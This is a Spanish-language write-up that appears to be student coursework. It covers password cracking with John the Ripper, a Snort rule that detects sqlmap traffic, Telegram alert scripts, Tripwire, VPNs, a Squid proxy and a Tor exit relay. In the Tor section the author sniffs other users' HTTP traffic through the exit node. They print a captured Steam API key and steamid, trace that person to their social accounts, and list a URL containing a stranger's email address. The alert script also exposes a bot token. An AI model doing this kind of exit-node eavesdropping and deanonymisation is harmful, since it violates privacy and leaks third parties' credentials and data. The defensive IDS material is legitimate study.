hemos obtenido las contraseñas de estos 3 usuarios a un coste nulo en términos de tiempo, esto es deido básicamente a la nula utilidad de las contraseñas introducidas, basicamente el algoritmo de crackeo intenta en primer lugar un `Single crack mode` después un `diccionario de palabras` y en ultima instancia un modo `Incremental`
* Single crack mode --> Usa información del GECOS y del home para usarla como contraseña ej. `pere:pere`
* Diccionario --> Usa una lista finita de candidatos. ej. `jose:12345678 marta:qwerty`
* Incremental --> Usa una combinación infinita de posibilidades es el modelo mas poderoso, pero el que mas inconvenientes puede llegar acarrear.
* External mode --> Se basa en programar un modulo externo para crackear un determinado estilo de contraseñas que tu conozcas.

Intentamos ponérselo mas difícil.

```
grande:12345678holaamigos
imposible:778859621:pcfgtTT

```

Debido a la complejidad de las contraseñas, dada su longitud y/o inclusión de caracteres especiales, no ha podido resolverlas mediante los primeros métodos de crackeo, teniendo que atacarlas mediante el método `incremental`.
Por cada iteración, la contraseña se cifra y se compara con el `hash` a descifrar y si estos coinciden, la palabra buscada es la misma que la generada, bueno esto no es exactamente cierto, no obstante se convierte en un candidato potencial.

Tenemos que tener claro que cuando tenemos una función de `Hash` si la entrada no es acotada podemos tener lo que se conoce como colisiones, las colisiones se producen cuando al aplicarse una función hash a 2 valores distintos obtenemos el mismo hash, esto no debería suceder porque la finalidad de los algoritmos de `hash` es conseguir que la función sea `inyectiva`,

![Alt Text](aux/john.gif)
___

# Detección de Intrusiones

## NIDS

Anteriormente hemos utilizados un sniffer de paquetes para marcar los paquetes que enviaba `Sqlmap`  al servidor victima, este tipo de actuaciones en las que se detecta al intruso a través del trafico de la red, se engloban dentro del marco de los NIDS (Network Intrusion Detection System), y tienen como objetivo alzar un muro entro nuestros sistemas e internet, de cara a que no se produzcan intrusiones en nuestros sistemas.
Existen muchos programas que tienen como objetivo cumplir con lo anteriormente entre ellos `snort`, `suricata`, `BroIDS`

## Snort

`Snort` es un programa de detección de intrusos en red, libre y gratuito, implementa un motor capaz de registrar, alertar y responder ante cualquier anomalía definida mediante reglas, su mayor baza es la comunidad que tiene detrás, la cual publica reglas ante las ultimas amenazas conocidas.

### Configuración y creación de reglas para snort

Snort en una aplicación `opensource` que permite realizar un análisis exhaustivo del trafico de una red, tiene 3 modos de empleo:
* Modo Sniffer --> Muestra el contenido de los paquetes por pantalla
* Modo Logger  --> Escribe en el disco duro el trafico tratado
* Modo Detección de Intrusiones --> Es capaz de ejecutar ciertas acciones en función del contenido del paquete analizado.

Una de las características mas utilizadas es la creación de reglas para filtrar el contenido de los paquetes y alertar de posibles ataques o intrusiones.
La sintaxis de estas reglas son muy sencillas y se parecen bastantes a las reglas de iptables.

[1.tipo de alerta][2.tipo de trafico][3.direccion_exterior][4.puerto de entrada] -> [3.dirección_exterior][4.puerto de entrada] (msg:"mensaje"; opciones:"";)

Una vez configurado el programa, se iniciará en modo `NIDS` para enviarnos alarmas cada vez que exista un `match` para la siguiente regla.


```
snort -s -A fast -c /etc/snort/snort.conf -i docker0 -k none
alert tcp any any -> $HOME_NET $HTTP_PORTS (msg:"Sqlmap inyection"; flow:to_server,established; content:"sqlmap";nocase; classtype:unknown; sid:99000001; rev:1;)

```
En la cual, enviamos una alerta cuando se reciban paquetes que contengan una firma que incluya la palabra `sqlmap`

```
05/16-00:24:54.508362  [**] [1:99000001:1] sqlmap scan [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.17.0.2:50866 -> 172.17.0.4:80
```
![Alt Text](aux/snort.gif)

## Registro de logs y envío de información de manera automática

Para enviar las alertas, debido a que posiblemente la herramienta que usemos para filtrar el trafico, no se ejecute en el ordenador donde estemos trabajando, podemos realizar un pequeño script en bash para automatizar un trabajo con `cron` y enviarnos las alertas al móvil, mediante un pequeño `bot` de telegram.

```
#!/bin/bash

TOKEN="723456014:AAFDkhDyJ31pi9QbFszrYwmrv9ugtXjXjT8"
ID="173955695"
URL="https://api.telegram.org/bot$TOKEN/sendMessage"


while read -r line
do
  curl -s -X POST $URL -d chat_id=$ID -d text="$line"
done

```
Añadimos la rutina necesaria a `crontab` para que nos envíe la información.

```
crontab -e

*/1 * * * * tail /home/vkk/Escritorio/snort/alert -n 1 | grep "sqlmap" | /home/vkk/Escritorio/telegram.sh && echo -e "\n" >> /home/vkk/Escritorio/snort/alert


```

Buscamos el patrón en el archivo de logs, enviamos la salida a través del bot de telegram, seguidamente incluimos una linea en blanco porque si modificamos el archivo borrando algo, el flujo de escritura se termina.

## HIDS

Por otro lado tenemos programas que no bloquean la intrusión, sino que centran sus esfuerzos en construir una base de datos de las ubicaciones criticas del servidor, así si alguna persona es capaz de entrar en el servidor, y esta quiere instalar su propio software de cara a usar el mismo como mejor le convenga, los cambios realizados por el intruso se conocen a la perfección y se pueden revertir.
Esta idea es bastante acertada, pero requiere de una configuración minuciosa y sobretodo puede conllevar un gran numero de positivos, en función del uso principal del servidor, lo que se traduce en la necesidad de una lectura pausada de los logs generados.

## Tripwire

Tripwire es una herramienta `Opensource `que monitoriza y alerta de los cambios en el sistema de ficheros, se ha instalado en un VPS sobre un sistema Ubuntu.
Su instalación es sencilla pero requiere de un conocimiento amplio de la maquina y de su jerarquía de ficheros, debido a que la configuración estándar del servicio es demasiado global y contempla ubicaciones que raramente existen en la actualidad, lo que arroja errors a la hora de generar la base de datos y encriptarla.

```
vi twcfg.txt
vi twpol.txt
twadmin --create-polfile twpol.txt
tripwire --init
tripwire --check
touch /etc/jose.txt
tripwire --check

```
Durante la instalación se crear un par de claves, que se usaran para encriptar la base de datos generada por tripwire.

Se deben de modificar los archivos siguientes, para especificar las rutas que deben de ser monitorizadas.

```
vi twcfg.txt
vi twpol.txt
twadmin --create-polfile twpol.txt

```
La base de datos se genera con la orden `tripwire --init` y se consulta la integridad de la misma con la orden `tripwire --check`, esto genera un informe donde se explicitan los cambios generados.

```

Added:
"/var/lib/tripwire/vmi268117.contaboserver.net.twd"

-------------------------------------------------------------------------------
Rule Name: System boot changes (/var/log)
Severity Level: 100
-------------------------------------------------------------------------------

Modified:
"/var/log/syslog.2.gz"
"/var/log/syslog.3.gz"
"/var/log/syslog.4.gz"
"/var/log/syslog.5.gz"
"/var/log/syslog.6.gz"
"/var/log/syslog.7.gz"
"/var/log/tor/notices.log.2.gz"
"/var/log/tor/notices.log.3.gz"
"/var/log/tor/notices.log.4.gz"
"/var/log/tor/notices.log.5.gz"

-------------------------------------------------------------------------------
Rule Name: Other configuration files (/etc)
Severity Level: 66
-------------------------------------------------------------------------------

Added:
"/etc/tripwire/.twpol.txt.swp"
"/etc/telegram.sh"
"/etc/primo"
"/etc/jose.txt"

Modified:
"/etc"
"/etc/tripwire"

-------------------------------------------------------------------------------
Rule Name: Root config files (/root)
Severity Level: 100
-------------------------------------------------------------------------------

Added:
"/root/telegram.sh"
"/root/hola.txt"
"/root/.selected_editor"

Modified:
"/root"
"/root/.bash_history"
"/root/.viminfo"

===============================================================================

```

Cuando se ejecuta `tripwire --update --twrfile fichero.twr` de nuevo, se vuelve a regenerar la base de datos, aceptando de esa manera los cambios realizados.

```
Section: Unix File System
-------------------------------------------------------------------------------

 Rule Name                       Severity Level    Added    Removed  Modified
 ---------                       --------------    -----    -------  --------
 Other binaries                  66                0        0        0        
 Tripwire Binaries               100               0        0        0        
 Other libraries                 66                0        0        0        
 Root file-system executables    100               0        0        0        
 Tripwire Data Files             100               0        0        0        
 System boot changes             100               0        0        0        
 Critical system boot files      100               0        0        0        
 Other configuration files       66                0        0        0        
 (/etc)
 Boot Scripts                    100               0        0        0        
 (/etc/init.d)
 Security Control                66                0        0        0        
 Root config files               100               0        0        0        
 (/root)
 Invariant Directories           66                0        0        0        

Total objects scanned:  16220
Total violations found:  0

===============================================================================
Object Summary:
===============================================================================

-------------------------------------------------------------------------------
# Section: Unix File System
-------------------------------------------------------------------------------

No violations.

===============================================================================
Error Report:
===============================================================================

No Errors

-------------------------------------------------------------------------------
*** End of report ***

```
![Alt Text](aux/trip.gif)

## Registro de logs y envío de información de manera automática

La mayoría de programas de este estilo, contemplan la posibilidad de enviar informes a través de servidores de correo, no obstante usaremos las notificaciones a través del bot de telegram usado para el supuesto anterior, así que agregaremos la siguiente linea en el crontab del servidor

```
@daily /usr/sbin/tripwire --check | /root/telegram.sh

```

___

# Anonimato en la red

En este apartado vamos a explorar las distintas opciones que nos plantea la red para enmascarar y anonimizar comunicaciones, de cara a obtener este resultado se explorarán opciones como las `VPN`, `Proxys` o la red `Tor`

## VPN

`VPN` son las siglas de *Virtual Private Network* y resumiendo mucho se trata de crear una conexión punto a punto, lo que quiere decir que la ip de tu proveedor de internet no sera el nexo de unión con internet, sino que crearas una conexión segura desde tu salida a internet a un servidor, y para todo el tráfico que consumas en la red, la cara visible será el servidor al que estés conectado.

![info vpn](aux/VPN-1.png)

Existen principalmente dos tipos de usos relacionados con las `VPN` el primero reside en el teletrabajo, pues puedes conectarte a una organización a través de cualquier `ISP` y para ella ser un elemento mas de su red privada, teniendo acceso a todos los recursos limitados a la red local, como `NAS` o `Aplicaciones web` o `Software específicos con licencia limitada`.

La segunda opción es la capacidad de evitar bloqueos geográficos, cuando la dirección `ip` que reciben los distintos servicios esta asociada a un rango de direcciones localizadas geográficamente en otro continente, tienes acceso a un tipo de recursos que normalmente no están al alcance de todos los territorios, o simplemente puedes escapar de las webs bloqueadas por orden judicial/estatal vía `ISP`.

![info vpn](aux/VPN-2.png)


### Principales VPN del mercado

En el mercado existen dos tipos de servicios `VPN` los gratuitos y los de pago, el modelo de negocio y su diferenciación entre planes pivota en dos sentidos `capacidad de transferencia de datos` y `posibilidad de elección de servidor` los servicios de pago suelen tener cuotas de transferencia ilimitadas o en su defecto muy altas, y una gran cantidad de servidores para elegir y sobretodo tener su base en una zona neutra, los principales servicios tienen sus sedes en `Panamá` o `Islas virgenes`, según la rumorología de internet y los cables de `Snowden` se tienen que evitar servicios ubicados en `USA`, `UK`,`Canada`,`Nueva Zelanda`,`Australia`,`Dinamarca`,`Francia`,`Holanda`,`Noruega`,`Alemania`,`Bélgica`,`Italia`,`Suecia`, `España`, `Israel`,`Japón`,`Corea del Sur`.

#### Plan de precios

* Nordvpn 2.62 euros/mes, Reside en `Panamá`, incluye `killswitch` que corta tu conexión si la `vpn` deja de funcionar.
wi
* ExpressVPN 12.95 - 6.67 euros/mes, Reside en las `Islas Virgenes Británicas`, tiene `Killswitch` y un buen `feedback` por parte de la comunidad

* GooseVPN 4.99 euros/mes No tiene `Killswitch` y solo está presente en 27 países.

Como se puede observar el precio oscila entre los 3 y los 7 euros, no obstante el precio se puede reducir drásticamente si se contratan planes anuales.


#### Peligros del uso de VPN gratuitas o freemium

Cuando se usan servicios VPN gratuitos, debemos de darnos cuenta de que si algo es lo suficientemente bueno, tiene un coste, y ese coste suele traducirse en un precio, *nadie da duros a cuatro pesetas.*, uno de los casos mas controvertidos de los últimos años fue de la `Hola` una Vpn gratuita con un funcionamiento robusto y sencillo, no obstante cuando se firmaban las condiciones de uso, estabas cediendo parte de tu ancho de banda y ellos, lo revendían a otras empresas en su caso a `Luminati` y esta empresa usaba ese ancho de banda para lo que quería, y en su día quiso hacer un ataque de denegación de servicio a la web `8chan` ya que contaban con una `botnet` de mas de 6 millones de usuarios gracias a la `vpn` de `HOLA`

A pesar de que esto es un caso puntual, debemos de darnos cuenta que estos servicios gratuitos, pueden almacenar toda clase de datos personales y venderlos al mejor postor.

#### Conclusiones

Las VPN son soluciones que ofrecen un nivel alto de anonimato y seguridad, las conexiones entre el host y el servidor suelen estar cifradas con algoritmo de alto nivel como el AES de 256 bits lo que indica a priori que la información que viaja a través de estos servidores esta a salvo de ser desencriptada, no obstante, como se ha comentado anteriormente la necesidad de que el proveedor de la VPN sea transparente con sus clientes y no guarde logs de las conexiones establecidas y luego las pueda ceder a cualquier organismo que las solicite.

## PROXYs

Un `proxy` es un intermediario que se ubica entre un cliente y un servidor, principalmente se usan como filtro, para que las peticiones entre el cliente y el servidor, se enmascaren de manera que parezca que las conexiones se realizan entre el proxy y el servidor.

![info proxy](aux/PROXY.png)

### Ventajas del uso de un proxy.

El uso de proxys aporta una serie de ventajas que se enumeran a continuación:

* Control --> Todo el tráfico es registrado a través del proxy lo que se traduce en una mayor facilidad para filtrar el trafico.

* Velocidad --> El proxy puede actuar como cache web, lo que se traduce en un aumento de la velocidad en las respuestas.

* Anonimato --> Los proxys pueden enmascarar nuestra ip, haciendo que esta nuestra identidad sea difícil de rastrear.

### Desventajas del uso de un proxy

Los problemas de tener un servidor por donde pasa todo el trafico, es que este servidor puede sobrecargarse y bajar su rendimiento notablemente, también almacenan cache, lo que puede verse como una pequeña intromisión e inseguridad.

### Tipos de servidores proxy

* Proxy web --> Servidor que se utiliza como filtro de cara a navegar por la red, enmascara la ip origen.

* Proxy inverso --> Es un filtro de seguridad que se añade a los servidores web para filtrar conexiones entrantes.

* Proxy NAT --> Básicamente es un enmascaramiento tipo `NAT` entre la `LAN` y la `WAN`

* Proxy transparente --> Combina un servidor proxy con un cortafuegos, de manera que las conexiones entrantes son desviadas hacia el proxy, normalmente utilizadas por `ISPs`

* Proxy abierto --> Es un servidor abierto que acepta conexiones de cualquier host, incluso si este no esta en su red.

![info proxy](aux/PROXY-2.png)

### Creación de un servidor proxy

Para esta parte, se ha contratado una maquina `VPS` con ip `167.86.116.88` donde se realizaran las configuraciones necesarias para instalar y configurar un servidor proxy.
Dado que la maquina que el servidor que tenemos contratado es un `ubuntu` instalaremos el paquete `squid`  y configuraremos el servidor proxy para aceptar nuestras conexiones.
El paquete `squid` basa su configuración en el archivo `/etc/squid/squid.conf` el cual nos permite costumizar desde los elementos mas complejos como pueden ser autenticaciones, acls, bloqueos de paginas web, hasta elementos tan triviales como puertos de escucha.

A continuación veremos ejemplos del uso de `squid` como `proxy` asi como de la  configuración de `squid.conf` para bloquear listas de de paginas web mediante `acls`.

#### Instalación

Para instalar el paquete en el servidor virtual ejecutamos la siguiente orden:

```
apt install squid

```
El archivo de configuración se ubica en:

```
/etc/squid/squid.conf

```
Para lanzar el servicio usamos systemctl:

```
systemctl start/restart squid


```

#### Configuración básica

Para probar en primera instancia modificamos el fichero para incluir la siguiente directiva, damos acceso a nuestro proxy a cualquier maquina que conozca nuestra ip.

```
# And finally deny all other access to this proxy
http_access allow all

```

Para probar si funciona, podemos utilizar la herramienta `curl` que es muy ágil de cara a probar configuraciones, o simplemente asignar un servidor proxy a alguno de nuestros navegadores web.

En `Firefox` la configuración se realiza mediante la url `about:preferences#general`

![info proxy](aux/PROXY-3.png)

Mediante `curl`

```
[vkk@192 ~]$ curl -x http://167.86.116.88:3128 -I http://google.com
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Mon, 27 May 2019 10:55:46 GMT
Expires: Wed, 26 Jun 2019 10:55:46 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Cache: MISS from vmi268117.contaboserver.net
X-Cache-Lookup: MISS from vmi268117.contaboserver.net:3128
Via: 1.1 vmi268117.contaboserver.net (squid/3.5.27)
Connection: keep-alive

```

#### Inclusión de ACL's

Creamos un fichero donde guardaremos las paginas web a las que queremos restringir su acceso.

```
meneame.net
marca.com
vox.es
reddit.com
hltv.org

```

Añadimos la acl correspondiente a la pagina de configuración:

```
acl blocked_sites dstdomain "/etc/squid/paginas"
http_access deny blocked_sites

```

Reiniciamos el servicio y hacemos una petición al servidor.

```
[vkk@192 ~]$ curl -x http://167.86.116.88:3128 -I http://meneame.net
HTTP/1.1 403 Forbidden  ------NO ACCESO
Server: squid/3.5.27
Mime-Version: 1.0
Date: Mon, 27 May 2019 11:32:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3560
X-Squid-Error: ERR_ACCESS_DENIED 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from vmi268117.contaboserver.net
X-Cache-Lookup: NONE from vmi268117.contaboserver.net:3128
Via: 1.1 vmi268117.contaboserver.net (squid/3.5.27)
Connection: keep-alive

```

Como se puede apreciar no se ha podido acceder al contenido, debido a que esta dirección esta vetada en el archivo de configuración.

#### Snifado de la red mediante Wireshark/ TCPDUMP

Usando wireshark vemos de manera clara que todas las conexiones http/s que realizamos desde nuestro navegador se trasladan a la ip de nuestro proxy.

![info proxy](aux/PROXY-4.png)


Haciendo un `tcpdump` en el servidor, y filtrando por la pagina web que hemos utilizado de prueba (104.16.161.71) tenemos el dialogo entre el proxy y la web.

```

13:52:22.673906 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 18260:21042, ack 1231, win 31, length 2782
13:52:22.673912 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 21042, win 582, length 0
13:52:22.674120 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 21042:22433, ack 1231, win 31, length 1391
13:52:22.674126 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 22433, win 605, length 0
13:52:22.674220 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 22433:23824, ack 1231, win 31, length 1391
13:52:22.674227 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 23824, win 628, length 0
13:52:22.674330 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 23824:25215, ack 1231, win 31, length 1391
13:52:22.674336 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 25215, win 650, length 0
13:52:22.674441 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 25215:26606, ack 1231, win 31, length 1391
13:52:22.674446 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 26606, win 673, length 0
13:52:22.674551 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 26606:27997, ack 1231, win 31, length 1391
13:52:22.674556 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 27997, win 695, length 0
13:52:22.674661 IP 104.16.161.71.https > vmi268117.contaboserver.net.39140: Flags [P.], seq 27997:29388, ack 1231, win 31, length 1391
13:52:22.674667 IP vmi268117.contaboserver.net.39140 > 104.16.161.71.https: Flags [.], ack 29388, win 718, length 0
```

haciendo un `tail -f /var/log/squid/*` obtenemos de una manera mas visual las conexiones realizadas entre el servidor proxy y la web de destino.

```

95.169.225.40 TCP_TUNNEL/200 32866 CONNECT www.meneame.net:443 - HIER_DIRECT/176.34.250.129 -
95.169.225.40 TCP_TUNNEL/200 30131 CONNECT www.meneame.net:443 - HIER_DIRECT/176.34.250.129 -
95.169.225.40 TCP_TUNNEL/200 106949 CONNECT www.meneame.net:443 - HIER_DIRECT/176.34.250.129 -

```

#### Ssl_bump

El servidor proxy squid, puede ser configurado con una directiva `ssl_bump`, lo que quiere decir que los mensajes entre el servidor web y el servidor proxy se pueden leer como si se tratasen de trafico `http`, normalmente el trafico generado entre el servidor proxy y el web viaja a través de un tunel TCP, se crea una conexión entre el proxy y el servidor, este contesta con un código 200 si la conexión es satisfactoria y los paquetes viajan a través del túnel, sin ser interpretados de ninguna manera.

#### Conclusiones

Los servidores proxy son herramientas geniales para el control de tráfico, incluso para ocultar tu ip en aplicaciones básicas, saltándote de esa manera los típicos `region blocks`, pero a nivel de seguridad son algo ineficientes, debido a que el tráfico inicial que envías al servidor proxy puede ser desencriptado por parte del servidor PROXY.


## TOR

### Que es tor

`TOR` *The Onion Router* es el nombre de un proyecto que tiene como sino crear una red superpuesta a internet, donde sea extremadamente difícil averiguar tu dirección ip y por ende tu identidad.
*The Onion Router* escenifica el hecho de que la verdadera identidad, reside dentro de un sin fin de capas, lo que hace extremadamente difícil analizar el remitente.
Las conexiones normales entre host y servidor, a pesar de que los datos que se envían son seguros, gracias al protocolo `https` una persona capaz de analizar los paquetes enviados, puede ver tanto el destinatario como el remitente, debido a que las cabeceras no se cifran.

### Como cifra las comunicaciones Tor.

El *onion routing* consiste en enviar el paquete de datos a través de ciertos nodos intermedios calculados de manera aleatoria para que la latencia de los paquetes sea la mínima posible, estos nodos llamados comúnmente *tor-relay*, publican sus claves publicas en un repositorio publico, entonces el mensaje se va cifrando por capas, primero se cifra con la clave del último nodo así como las instrucciones para llegar a su destino, después se vuelve a cifrar con la clave publica del penúltimo nodo todo el paquete, y así consecutivamente y para todos los nodos que tiene que cruzar el paquete.
Cuando el paquete llega al primer nodo, este lo descifra y sigue las instrucciones para enviar el resto del paquete al siguiente nodo, que hará exactamente lo mismo hasta llegar al nodo de salida *tor-exit* que será el que envíe el mensaje al destino final.
Por lo que se supone que ningun nodo intermedio conoce ni el destino final, ni el inicial de dicho paquete.

### Porque usar tor

A pesar de ser una aplicación que tiene un rango de actividad algo distinta y que pivota entre el usuario experto y el paranoico, el uso de tor en cuando a seguridad y anonimato es sin duda la opción mas completa, la manera que tiene de tratar la conectividad la hace muy robusta, pero esta robustez se traduce en una lentitud exagerada en ciertos casos, y lo que es peor, te pone en el punto de mira de mucha gente dado que el uso principal de tor no es el leer las noticias, sino el de acceder a una red superpuesta capaz de mantener e indexar contenido que no esta disponible fuera de este ecosistema.
No obstante a pesar de que existen muchos nodos intermediarios que aumentan la malla virtual del servicio, alojar un `tor-exit` cada vez es mas complicado, las principales empresas de servidores dedicados o VPS suelen tener bastantes restricciones al respeto, e incluso cuando te topas con alguna que profesa cierta empatía con la causa o simplemente miran hacia otro lado, suelen comenzar con sus políticas de `Bandwidth throttling` a las pocas horas de configurar el nodo de salida.
Sin contar con que el hecho de que existan pocos nodos de salida simplifica la posibilidad de vetarlos e impedir que se navegue desde los mismos.

### Configuración de un exit-relay

Para esta parte se ha configurado un nodo de salida de tor, en el servidor VPN, el VPN contratado admite construir nodos de salida, pero se reservan el derecho a cerrarte el servidor, si reciben alguna queja o aplicar políticas de `Bandwidth throttling` si la carga fuese excesiva.

Para configurar el servicio se ha utilizado los scripts de configuración automática que ofrece la plataforma `https://tor-relay-co`

### Filtrado de las conexiones HTTP

Debido a que hemos configurado un nodo de salida, podemos obtener cierta información sobre las conexiones de salida que pasan por nuestro nodo, eso si los datos cifrados con el mediante el protocolo `https` nos son imposibles, no obstante cuando se producen conexiones `http` podemos obtener cierta información.
El uso de protocoles web poco seguro a través de aplicaciones de cifrado multicapa como tor, impiden rastrear el host que establece la conexión, pero nos dan información sobre el recurso al que quieren acceder.

Para esta parte se han estudiado los datos generados por `httpry` durante 3 horas, en las que intentaremos ver la tipología de búsquedas, y encontrar alguna URL que nos pueda dar información del usuario que esta accediendo al servicio.

Sin ir mas lejos vemos una búsqueda dentro de una api de steam,
```
"GET http://api.steampowered.com/ISteamUser/GetFriendList/v1/?key=97B191ED0FFD88DB0BE9613DF53E400D&steamid=76561198869819982 HTTP/1.1"

```



Miramos la steamid que es `76561197963504154` , lo buscamos en la comunidad...


![info steam](aux/steam.png)


Nos encontramos ante una persona que usa un servicio que tiene como objetivo aumentar su seguridad y su anonimato, y nos da su `twich`  y su `twitter`.

### Tratamiento de los logs generados

Aplicamos un poco de formato a los logs para obtener solo las url

```
cut -f7 -d' ' sniff.txt | sort -u > sniff-final.txt

```
Ejemplo

```
http://009.frnl.de/box.php
http://0351ets.com/
http://0351ets.com/?name=5d0223482a56a&email=jbedson1%40gmail.com&tel=&content=&
http://0415s.com/
http://0415s.com/index.php?case=guestbook&act=index
http://0489.com/
http://0489.com/domain.asp
http://0c1j67hl8dxc.puscomosca.com/pus2bv_tit.js
http://0.gravatar.com/avatar/0bbc436bbf409b075a062b159a081374?s=64&d=retro&r=g
http://0.gravatar.com/avatar/331b91e9dab811c51354218417d32fa8?s=64&d=retro&r=g

```
Después de filtrar algunas url podemos ver que el sexo y Rusia tienen un gran impacto en el trafico analizado.
Cosa que hace que en realidad no tendría por que sorprendernos.

![info tor](aux/grafico-tor.png)



### Conclusión Final

De cara a realizar algunos de los apartados de este trabajo, decidí alquilar una VPS de cara a poder experimentar en primera mano y sin virtualizar algunos de los escenarios tratados a lo largo de este trabajo, no obstante una de las primeras cosas de las que me percate era la ingente cantidad de ataques que recibía mi máquina, por lo que gracias a las herramientas tratadas a lo largo de este trabajo me decidí a monitorizarlas, para recabar información sobre los atacantes, recopilar sus direcciones ips, buscar patrones y añadirlas a nuestro NIDS.

Uno se pregunta el porqué de estos intentos de conexión y la respuesta a esta pregunta es sencilla, existen dos razones básicas para querer tener acceso a un recurso externo, el primer supuesto es sencillo, obtener datos, información, o acceso a aplicaciones, el segundo es mas difícil de explicar, pero muy fácil de entender, tener acceso a esta VPS te da acceso a una conexión ilimitada y a unos recursos computacionales altos, incluirte en su `botnet`, es su finalidad ultima, y es que hemos de cambiar nuestra concepción de seguridad y de ataque informático y darnos cuenta que muchas de estas acciones no son sino un pequeño paso dentro de una hoja de ruta mucho mas extensa y difícil de entender.

### Buscar accesos

```
journalctl --since "10 days ago" --until "now" > fichero_parsed.txt
cat fichero_parsed.txt | grep "rhost=" | cut -f14 -d' ' | > ip.txt
sed -i 's/rhost=//g' ip.txt
sort -u ip.txt > ip-sorted.txt

```

Una vez tenemos las ips que han intentado acceder a nuestra maquina, y no lo han conseguido, podemos filtrarlas linea a linea usando un bucle `while read` y pasarle un `geoiplookup` a cada ip, para poder ordenar por países los intentos de conexión.

![paises](aux/aux.png)


Como se puede apreciar en el gráfico anterior el país que registra un numero de ataques a mi máquina más elevado es Estados Unidos, seguido de lejos por Francia.
El paso simple después de este análisis es agregar estas ips a la lista negra del NIDS.
